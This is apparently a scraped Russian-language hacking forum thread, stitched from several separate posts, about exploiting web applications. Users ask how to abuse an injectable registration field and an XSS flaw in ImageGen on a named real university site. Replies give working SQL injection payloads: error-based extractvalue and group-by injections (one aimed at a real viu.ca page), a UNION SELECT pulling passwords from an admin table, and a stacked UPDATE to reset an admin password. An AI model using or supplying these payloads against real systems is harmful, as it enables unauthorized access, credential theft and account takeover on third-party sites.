При пост запросе в нейм %5C или \ выдает Здесь куда-то иньекцию подставить можно? или как то это использовать...?
Да вот имеено.. дело в том, что если пишешь какой либо запрос, он просто пропускает это поле и регистрирует аккаунт без ошибок.. %5C' - ошибка ' - нет ошибки %5C' пробел - нет ошибки
Кроме name другие параметры проходят через фильтр? Code: email1=asaa%40mail3.ru%5c&mail2=asaa%40mail3.ru%5c&name=,user()and(extractvalue(1,concat(0x3a,user()))),NOW());%23 Можно линк в лс?
jquery cross site scripting - Кто слышал о таких уязвимостях? Что они из себя предстовляют? Может у кого есть примеры или мануал...
Всем привет. Не подскажете, как эксплуатируется XSS в параметре font в Imagegen, CVE-2013-0741 (http://secunia.com/community/advisories/52771). Например, здесь http://www.viu.ca/ImageGen.ashx?image=/homestay/galleria_photos/013.JPG&width=960
как изменить пароль через sql инъекцию по гуглив немного я нашел вот что UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее: UPDATE users SET password = ‘qwerty’ WHERE name = admin; помогите составить запрос http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
Там есть нечто большее: Code: http://www.viu.ca/events/event.aspx?id=9275%20or%28select%281%29from%28information_schema.schemata%29where%281=1%29group%20by%28concat%28version%28%29,0x3b,user%28%29,floor%28rand%280%29*2%29%29%20%29having%28min%280%29%29%29
Точнее нельзя использовать несколько запросов, точнее возможно, но их нужно разделять точкой с запятой ;. Например: PHP: www.site.com/victim.php?id=10'+union+select+1,2,3...; UPDATE 'admin_login' SET 'password' = 'pas1' WHERE login_name='adm' В случае с Mysql это не прокатит.
Это ещё зависит от используемого ЯП и функции выполнения запросов. В стандартной mysql_query из php множественные запросы запрещены))
